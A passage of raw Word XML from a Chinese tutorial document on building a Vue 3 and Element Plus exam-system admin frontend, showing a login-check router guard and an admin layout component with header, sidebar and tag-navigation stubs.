        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ADE973" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    showFullLoading()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E1D0A5" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230E2B20" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const token = getToken()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719934A7" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有登录，强制跳转到登录页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D85D631" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (!token &amp;&amp; to.path != "/login") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3276E274" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        toast("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请先登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", "warning")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DA4F04" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return next({ path: "/login" })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7315FBE1" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6CE61E" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C4DEA5" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止重复登陆</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9E404D" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (token &amp;&amp; to.path == "/login") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E159414" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        toast("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请勿重复登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>", "warning")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDE8F65" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return next({ path: from.path ? from.path : "/" })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712FDE25" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546A2415" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F7102D" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果用户登录了，自动获取用户信息，并存储在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vuex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3439F5" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A03AE8" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        await store.dispatch("getinfo")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B009406" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003B776F" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04619B38" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRPr="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>设置页面标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8C682C" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRPr="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    let title = to.meta.title ? to.meta.title : "</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>考试系统</w:t>
      </w:r>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38852402" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRPr="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C7E01">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    document.title = title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C320FA" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D4FA79" w14:textId="77777777" w:rsidR="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237F8C2F" w14:textId="1399E421" w:rsidR="000C7E01" w:rsidRPr="000C7E01" w:rsidRDefault="000C7E01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451B100D" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A4396CB" w14:textId="120B22F2" w:rsidR="003C4313" w:rsidRDefault="00680CEC" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="703" w:name="_Toc159780133"/>
      <w:r w:rsidRPr="00680CEC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>后台主布局实现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="703"/>
    </w:p>
    <w:p w14:paraId="4DFCBBF1" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C2F05A" w14:textId="2465916E" w:rsidR="003C4313" w:rsidRPr="00930C31" w:rsidRDefault="00930C31" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的布局组件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188BAACD" w14:textId="589FCBD2" w:rsidR="003C4313" w:rsidRDefault="00930C31" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00930C31">
        <w:t>https://element-plus.org/zh-CN/component/container.html#%E5%B8%B8%E8%A7%81%E9%A1%B5%E9%9D%A2%E5%B8%83%E5%B1%80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412448EC" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA7E92E" w14:textId="1EB6F30C" w:rsidR="00930C31" w:rsidRPr="00930C31" w:rsidRDefault="00930C31" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用于布局的容器组件，方便快速搭建页面的基本结构：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F005D4" w14:textId="6B96D080" w:rsidR="00930C31" w:rsidRPr="00930C31" w:rsidRDefault="00930C31" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;el-container&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：外层容器。</w:t>
      </w:r>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>当子元素中包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;el-header&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;el-footer&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>时，全部子元素会垂直上下排列，</w:t>
      </w:r>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>否则会水平左右排列。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E15A98F" w14:textId="0D3E00F2" w:rsidR="00930C31" w:rsidRPr="00930C31" w:rsidRDefault="00930C31" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;el-header&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：顶栏容器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD636BF" w14:textId="0500DD7F" w:rsidR="00930C31" w:rsidRPr="00930C31" w:rsidRDefault="00930C31" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;el-aside&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：侧边栏容器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D3F395" w14:textId="264A21D6" w:rsidR="00930C31" w:rsidRPr="00930C31" w:rsidRDefault="00930C31" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;el-main&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：主要区域容器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280E6665" w14:textId="7B3473C4" w:rsidR="003C4313" w:rsidRPr="00181907" w:rsidRDefault="00930C31" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;el-footer&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00930C31">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：底栏容器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7AF04E" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4661C258" w14:textId="622E9FF8" w:rsidR="003C4313" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>rc/layouts/admin.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6973ED" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12464325" w14:textId="77777777" w:rsidR="00BD4492" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8AA9ED" w14:textId="77777777" w:rsidR="00BD4492" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;el-container&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA5A783" w14:textId="77777777" w:rsidR="00BD4492" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-header&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;f-header&gt;&lt;/f-header&gt;&lt;/el-header&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14183232" w14:textId="77777777" w:rsidR="00BD4492" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;el-container&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4A6753" w14:textId="77777777" w:rsidR="00BD4492" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-aside&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>侧边</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;f-menu&gt;&lt;/f-menu&gt;&lt;/el-aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646AE013" w14:textId="77777777" w:rsidR="00BD4492" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-main&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签导航</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;f-tag-list&gt;&lt;/f-tag-list&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73231BBB" w14:textId="77777777" w:rsidR="00BD4492" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;router-view&gt;&lt;/router-view&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EBC52E" w14:textId="77777777" w:rsidR="00BD4492" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-main&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F82D16" w14:textId="77777777" w:rsidR="00BD4492" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-container&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E66162" w14:textId="77777777" w:rsidR="00BD4492" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/el-container&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B32D5E0" w14:textId="77777777" w:rsidR="00BD4492" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2843D415" w14:textId="77777777" w:rsidR="00BD4492" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2BFE13" w14:textId="77777777" w:rsidR="00BD4492" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import FHeader from './components/FHeader.vue';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBEED94" w14:textId="77777777" w:rsidR="00BD4492" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import FMenu from './components/FMenu.vue';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AD15F7" w14:textId="77777777" w:rsidR="00BD4492" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import FTagList from './components/FTagList.vue';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B910949" w14:textId="49307E58" w:rsidR="003C4313" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061E2C96" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15B1B957" w14:textId="16704CEF" w:rsidR="003C4313" w:rsidRPr="00181907" w:rsidRDefault="00BD4492" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>/layouts/components</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>Header.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>Menu.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>TagList.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E20015D" w14:textId="2129780C" w:rsidR="003C4313" w:rsidRDefault="004A250B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004A250B">
        <w:t>FHeader.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE146EC" w14:textId="77777777" w:rsidR="003C4313" w:rsidRDefault="003C4313" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F44170" w14:textId="77777777" w:rsidR="005F5B57" w:rsidRDefault="005F5B57" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657F65D0" w14:textId="77777777" w:rsidR="005F5B57" w:rsidRDefault="005F5B57" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签导航</w:t>
      </w:r>
      <w:r>
